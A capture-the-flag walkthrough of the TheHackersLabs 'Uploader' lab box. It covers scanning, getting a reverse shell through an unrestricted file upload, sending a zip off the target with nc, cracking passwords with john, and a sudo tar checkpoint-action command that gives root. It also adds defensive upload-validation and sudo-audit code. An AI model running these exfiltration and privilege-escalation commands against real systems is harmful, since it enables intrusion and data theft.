TheHackersLabs-Uploader-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
Password:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.155 08:00:27:64:85:d0 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fc:db:36 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.935 seconds (132.30 hosts/sec). 4 responded
export ip=192.168.60.155
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.155:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 14:14 CST
Initiating ARP Ping Scan at 14:14
Scanning 192.168.60.155 [1 port]
Completed ARP Ping Scan at 14:14, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:14
Scanning shieldweb.che (192.168.60.155) [1 port]
Discovered open port 80/tcp on 192.168.60.155
Completed SYN Stealth Scan at 14:14, 0.02s elapsed (1 total ports)
Nmap scan report for shieldweb.che (192.168.60.155)
Host is up, received arp-response (0.00076s latency).
Scanned at 2025-08-24 14:14:53 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:64:85:D0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
Raw packets sent: 2 (72B) | Rcvd: 3 (314B)

Directory Enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 3968]
/uploads (Status: 301) [Size: 318] [--> http://192.168.60.155/uploads/]
/upload.php (Status: 200) [Size: 3277]
Progress: 122883 / 1102800 (11.14%)

File Upload

The site has a file upload feature.


Try uploading a reverse shell directly, then open it from the /uploads directory.
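The upload works because upload.php stores whatever is posted under a web-served directory, so a .php file lands in /uploads and executes. As an added example (not the challenge's upload.php, and written in Python rather than PHP so the logic stands on its own), here are the checks a defender would put between the request and the storage step: a single allowlisted extension, a magic-byte check against the declared type, a scan for server-side code markers, and a random server-side filename. The allowlist, marker list and sample bodies are constructed for this example.

```python
import secrets

# Constructed allowlist for this example: extension -> required leading bytes.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Byte sequences that mark server-side or client-side code inside an "image".
CODE_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied filename and body.

    Order matters: the cheap name checks run before the body is inspected.
    """
    if not filename or "/" in filename or "\\" in filename or "\x00" in filename:
        return False, "path separator or NUL in filename"
    parts = filename.lower().split(".")
    # Exactly one extension: rejects "shell.php.png", ".htaccess" and bare names.
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "exactly one extension required"
    ext = "." + parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext} not in allowlist"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    if any(marker in content for marker in CODE_MARKERS):
        return False, "embedded code marker"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-side name: random token plus the validated extension only."""
    ext = "." + filename.lower().rsplit(".", 1)[1]
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample bodies; the PNG header is the real 8-byte signature.
    samples = [
        ("shell.php", b"<?php echo 1; ?>"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 1; ?>"),
    ]
    for name, body in samples:
        ok, why = validate_upload(name, body)
        print(f"{name:15} -> {'ACCEPT' if ok else 'REJECT'} ({why})")
```

Validation alone is not enough: the upload directory should also be served with script execution disabled (for PHP under Apache, a `php_admin_flag engine off` or an equivalent handler override for /uploads), so that a file that slips past the checks is returned as bytes rather than run.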

Listen on a port

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from TheHackersLabs-Operator-192.168.60.155-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/TheHackersLabs-Operator~192.168.60.155_Linux_x86_64/2025_08_24-14_16_31-000.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@TheHackersLabs-Operator:/$

There is a hint in the /home directory

www-data@TheHackersLabs-Operator:/home$ cat Readme.txt
He guardado mi archivo zip más importante en un lugar secreto.
(I have saved my most important zip file in a secret place.)
www-data@TheHackersLabs-Operator:/home$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Aug 19 21:49 .
drwxr-xr-x 23 root root 4096 Aug 7 02:36 ..
-rw-r--r-- 1 root root 66 Aug 19 21:49 Readme.txt
drwxr-x--- 5 operatorx operatorx 4096 Aug 8 17:43 operatorx
www-data@TheHackersLabs-Operator:/home$ find / -name *.zip 2>/dev/null
/srv/secret/File.zip

Download the zip file to the local machine

www-data@TheHackersLabs-Operator:/home$ nc 192.168.60.100 1234 < /srv/secret/File.zip
---------------------
❯ nc -lvp 1234 > file.zip
listening on [any] 1234 ...
connect to [192.168.60.100] from shieldweb.che [192.168.60.155] 51354

Try to extract it; it clearly needs a password.

Brute-forcing it gives the password 121288

❯ 7z x file.zip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:10240, ASM

Scanning the drive for archives:
1 file, 430 bytes (1 KiB)

Extracting archive: file.zip
--
Path = file.zip
Type = zip
Physical Size = 430


Enter password (will not be echoed):
ERROR: Wrong password : Credentials/Credentials.txt

Sub items Errors: 1

Archives with Errors: 1

Sub items Errors: 1
❯ zip2john file.zip >hash
ver 2.0 file.zip/Credentials/ is not encrypted, or stored with non-handled compression type
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 64 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
121288 (file.zip/Credentials/Credentials.txt)
1g 0:00:00:00 DONE (2025-08-24 14:50) 7.692g/s 126030p/s 126030c/s 126030C/s 123456..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Extract again

❯ 7z x file.zip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=en_US.UTF-8 Threads:8 OPEN_MAX:10240, ASM

Scanning the drive for archives:
1 file, 430 bytes (1 KiB)

Extracting archive: file.zip
--
Path = file.zip
Type = zip
Physical Size = 430


Would you like to replace the existing file:
Path: ./Credentials/Credentials.txt
Size: 0 bytes
Modified: 2025-08-19 06:28:04
with the file from archive:
Path: Credentials/Credentials.txt
Size: 67 bytes (1 KiB)
Modified: 2025-08-19 06:28:04
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y


Enter password (will not be echoed):
Everything is Ok

Folders: 1
Files: 1
Size: 67
Compressed: 430
cat Credentials/Credentials.txt
User: operatorx

Password: d0970714757783e6cf17b26fb8e2298f

User Privilege Escalation

Switch to that user

In fact, logging in with that password directly does not work: it is an MD5 hash. Cracking it again gives 112233.

www-data@TheHackersLabs-Operator:/home$ su  operatorx
Password:

su: Authentication failure
www-data@TheHackersLabs-Operator:/home$ su operatorx
Password:
operatorx@TheHackersLabs-Operator:/home$ cd ~
operatorx@TheHackersLabs-Operator:~$ cat user.txt
4a8b1c3d9e2f7a6b5c8d3e1f2a7b6c9d

Root Privilege Escalation

The user has a sudo entry, so the GTFOBins command escalates directly.


operatorx@TheHackersLabs-Operator:~$ sudo -l
Matching Defaults entries for operatorx on TheHackersLabs-Operator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User operatorx may run the following commands on TheHackersLabs-Operator:
(ALL) NOPASSWD: /usr/bin/tar
operatorx@TheHackersLabs-Operator:~$ sudo /usr/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/usr/bin/tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
e1f9c2e8a1d8477f9b3f6cd298f9f3bd
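The root step works because the sudo rule grants `/usr/bin/tar` with no arguments pinned, so any option tar itself supports, including `--checkpoint-action=exec=...`, runs as root. As an added example (not part of the walkthrough, the challenge, or GTFOBins), here is a small auditor for `sudo -l` output that grades each rule by how much it hands out: `ALL` as critical, an unrestricted binary with a known command-running option as high, any other unrestricted binary as medium, and pinned arguments as low. The sample output is constructed from the tar rule above plus two contrasting rules, and the escape-option table is a hypothetical one-entry policy.

```python
import re

# Constructed sample in the shape of the `sudo -l` output above
# (the tar rule is the one from the box; the other two are added for contrast).
SAMPLE_SUDO_L = """\
Matching Defaults entries for operatorx on TheHackersLabs-Operator:
    env_reset, mail_badpass, use_pty

User operatorx may run the following commands on TheHackersLabs-Operator:
    (ALL) NOPASSWD: /usr/bin/tar
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) NOPASSWD: ALL
"""

# Binaries whose own documented options execute a command; tar's
# --checkpoint-action=exec=... is the one used in this walkthrough.
# Hypothetical, deliberately short policy table: extend it from your own review.
SHELL_ESCAPE_OPTIONS = {"tar": "--checkpoint-action=exec=..."}

# One rule line: (runas) [TAG: ...] command
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def audit_sudo_rules(text: str) -> list[dict]:
    """Parse `sudo -l` output and grade each rule by how much it grants."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True          # rules start after this header
            continue
        if not in_rules:
            continue                 # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        words = cmd.split()
        binary = words[0].rsplit("/", 1)[-1]
        nopasswd = "NOPASSWD" in m.group("tags")
        if cmd == "ALL":
            severity, note = "critical", "unrestricted: any command as the run-as user"
        elif binary in SHELL_ESCAPE_OPTIONS and len(words) == 1:
            severity = "high"
            note = f"{binary} with free arguments runs commands via {SHELL_ESCAPE_OPTIONS[binary]}"
        elif len(words) == 1:
            severity, note = "medium", "arguments not pinned; review the binary's options"
        else:
            severity, note = "low", "arguments pinned"
        findings.append({"runas": m.group("runas"), "nopasswd": nopasswd,
                         "command": cmd, "severity": severity, "note": note})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        flag = " NOPASSWD" if f["nopasswd"] else ""
        print(f"[{f['severity']:8}] ({f['runas']}){flag}: {f['command']}  # {f['note']}")
```

The fix on a box like this is to pin tar's arguments in sudoers (sudo matches the argument list exactly, so extra options cannot be appended) or to replace the rule with a root-owned wrapper script that takes no user-controlled options. On the detection side, a root shell spawned with tar as its parent is an unusual process tree that an execve audit rule will surface.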